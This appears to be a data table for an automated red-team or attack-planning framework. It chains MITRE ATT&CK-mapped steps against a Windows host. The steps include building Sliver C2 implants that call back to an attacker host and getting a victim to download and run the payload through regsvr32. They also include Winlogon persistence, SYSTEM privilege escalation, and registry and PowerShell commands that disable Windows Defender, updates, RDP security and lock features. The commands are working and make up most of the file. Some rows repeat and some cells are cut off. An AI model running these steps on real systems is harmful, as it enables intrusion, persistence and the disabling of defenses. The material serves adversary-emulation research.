- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| bb2176c4-855e-4b52-ab03-5fe2e58d8129 | Build DLL Sliver implant | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shared --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?file - file)', '(dll_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 5b852063-ca39-4600-b246-024897721010 | Simulate the victim execute a DLL file on its machine | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | This step simulates the victim executes a DLL file on its machine. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, use PowerShell or Command Prompt)\nregsvr32 #{DLL_PATH}\n"} | {'DLL_PATH': {'default': None, 'description': 'Saved path of the DLL file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(dll_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| cf6f614c-83c9-4018-911b-c432bb95acfd | User Context Verification | ['T1087.001'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['Account Discovery: Local Account\n'] | The whoami command retrieves the current user identity of the system. It executes the command on the remote system and returns the username of the account that is currently logged in. This command includes flag for setting a timeout. |
{'executor': 'Sliver Executor', 'command': 'whoami(#{SessionID})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(user_info_known ?t - host)'] |
| 36b514af-486f-44ad-9f56-09c9d904851d | Get Current Working Directory | ['T1083'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['File and Directory Discovery'] | The pwd command returns the current working directory of the remote system. It helps to determine the current directory where commands are being executed on the remote machine, which is crucial for file management and executing further commands. The command includes flags for setting a timeout. |
{'executor': 'Sliver Executor', 'command': 'pwd(#{SessionID})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(current_directory_info_known ?t - host)'] |
| f9c1197c-c5ef-4368-a10c-3a53003dbfbf | Remote Directory Listing | ['T1083'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['File and Directory Discovery'] | The ls <remote path> command lists files and directories in a specified remote path or the current directory if no path is provided. By default, it sorts listings by name in ascending order, but can also sort by size or modified time, with options to reverse the order. The command includes flags for sorting, reversing order, and setting a timeout. |
{'executor': 'Sliver Executor', 'command': 'ls(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(file_info_known ?t - host)'] |
| bc50eb97-4a6d-4a9d-b0b2-e9cf623a9106 | Build the executable file (service) of a Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a service executable payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format service --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(service_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(file_prepared_local ?file - file)', '(exe_file ?file - file)', ' |
| 19301991-c518-46ca-a622-378e1be4f1ad | Simulate the victim download and execute malicious payload file as Admin (Root) | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | None | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the target payload file\n3. Download the payload file\n4. Execute the payload file to #{PATH} as Admin (Root)\n"} | {'HOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)', '(exe_file ?file - file)', '(unallocated ?path - path)'] | ['(file_exists ?path - path ?file - file ?t - host)', '(file_executed ?file - file ?t - host)', '(file_executed_as_root ?f - file ?t - host)', '~(unallocated ?path - path)'] |
| 19301991-c518-46ca-a622-378e1be4f1ad | Simulate the victim download and execute malicious payload file as Admin (Root) | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | None | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the target payload file\n3. Download the payload file\n4. Execute the payload file to #{PATH} as Admin (Root)\n"} | {'HOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)', '(exe_file ?file - file)', '(unallocated ?path - path)'] | ['(file_exists ?path - path ?file - file ?t - host)', '(file_executed ?file - file ?t - host)', '(file_executed_as_root ?f - file ?t - host)', '~(unallocated ?path - path)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| bf9f9d65-ee4d-4c3e-a843-777d04f19c38 | Winlogon Shell Key Persistence - PowerShell | ['T1547.004'] | ART | ['windows'] | ['Persistence', 'Privilege Escalation'] | ['Boot or Logon Autostart Execution: Winlogon Helper DLL'] | PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff. |
{'executor': 'Powershell Executor', 'command': 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force\n'} | {'binary_to_execute': {'description': 'Path of binary to execute', 'type': 'path', 'default': 'C:\Windows\System32\cmd.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(file_exists ?binary_to_execute - path ?file - file ?target - host)', '(exe_file ?file - file)'] | ['(file_execution_at_startup ?file - file ?target - host)'] |
| f7f31777-1bbf-4ddc-b7a1-af9f46a5299b | Obtain a persistent Sliver Executor | [None] | Manual | ['windows', 'linux', 'macos'] | ['Persistence'] | [None] | Obtain the persistency of Sliver Executor via scheduled payload file execution. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?f - file)', {'operator': 'or', 'operands': ['(file_execution_at_time ?f - file ?target - host)', '(file_execution_at_startup ?f - file ?target - host)']}, '(unallocated ?s - executor)'] | ['(persistent_sliver_session ?s - executor ?target - host)', '~(unallocated ?s - executor)'] |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| a57fbe4b-3440-452a-88a7-943531ac872a | Zip a Folder with PowerShell for Staging in Temp | ['T1074.001'] | ART | ['windows'] | ['Collection'] | ['Data Staged: Local Data Staging'] | Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. |
{'executor': 'Powershell Executor', 'command': 'Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force\n'} | {'output_file': {'description': 'Location to save zipped file or folder', 'type': 'path', 'default': None}, 'input_file': {'description': 'Location of file or folder to zip', 'type': 'path', 'default': None}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] | ['(dir_data_saved ?dir - dir ?file - file)', '(file_exists ?output_file - path ?file - file ?target - host)', '(zip_file ?file - file)'] |
| b8cbd2a9-6967-4114-b2b5-162098f74a89 | Take Screenshot | ['T1113'] | Sliver | ['windows', 'linux', 'macos'] | ['Collection'] | ['Screen Capture'] | The screenshot() function takes a screenshot of the remote system with screenshot data in PNG format. |
{'executor': 'Sliver Executor', 'command': 'screenshot(#{SessionID})'} | {'SessionID': {'default': None, 'description': 'The session ID of the active Sliver connection.', 'type': None}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(screenshot_data_saved ?file - file ?t - host)', '(file_exists ?path - path ?file - file ?t - host)'] |
| 5a1d2b9f-4e7f-8a4d-3f7a-6c2e5e9f9f7c | Privilege Escalation | ['T1134'] | Sliver | ['windows'] | ['Privilege Escalation'] | ['Access Token Manipulation'] | The get_system command attempts to gain SYSTEM-level privileges. |
{'executor': 'Sliver Executor', 'command': 'get_system (#{hosting_process},#{config},#{SessionID})'} | {'hosting_process': {'description': 'Target process ID or name for privilege escalation'}, 'config': {'description': 'Configuration options for escalation method', 'default': 'Service'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?target - host)', '(sliver_session ?executorID - executor ?target - host)'] | ['(elevated_executor ?executorID - executor)'] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 6e0d1131-2d7e-4905-8ca5-d6172f05d03d | Disable Windows Shutdown Button | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(shutdown_button_disabled ?target - host)'] |
| 4b81bcfa-fb0a-45e9-90c2-e3efe5160140 | Disable Remote Desktop Security Settings Through Registry | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation |
{'executor': 'Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(rdp_security_settings_disabled ?target - host)'] |
| 2a78362e-b79a-4482-8e24-be397bce4d85 | Safe Mode Boot | ['T1562.009'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Safe Mode Boot'] | Allows adversaries to abuse safe mode to disable endpoint defenses that may not start with limited boot | {'executor': 'Elevated Command Prompt Executor', 'command': 'bcdedit /set safeboot network'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(endpoint_defense_disabled ?target - host)'] |
| 3e757ce7-eca0-411a-9583-1c33b8508d52 | Windows HideSCANetwork Group Policy Feature | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(networking_icon_group_policy_disabled ?target - host)'] |
| 01b20ca8-c7a3-4d86-af59-059f15ed5474 | Disable Windows OS Auto Update | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion. |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(auto_update_disabled ?target - host)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 6b8df440-51ec-4d53-bf83-899591c9b5d7 | Tamper with Windows Defender ATP PowerShell | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. |
{'executor': 'Elevated Powershell Executor', 'command': 'Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n'} | None | ['(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(virus_and_threat_protection_disabled ?target - host)'] |
| 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 | Remove Windows Defender Definition Files | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ |
{'executor': 'Elevated Command Prompt Executor', 'command': '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(anti_malware_disabled ?target - host)'] |
| 003f466a-6010-4b15-803a-cbb478a314d7 | Disable Windows Toast Notifications | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(toast_notification_disabled ?target - host)'] |
| 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 | Tamper with Windows Defender Registry | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info. |
{'executor': 'Elevated Powershell Executor', 'command': 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1\n'} | None | ['(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(windows_defender_disabled ?target - host)'] |
| 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 | Disable Windows Lock Workstation Feature | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature. See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(lock_workstation_disabled ?target - host)'] |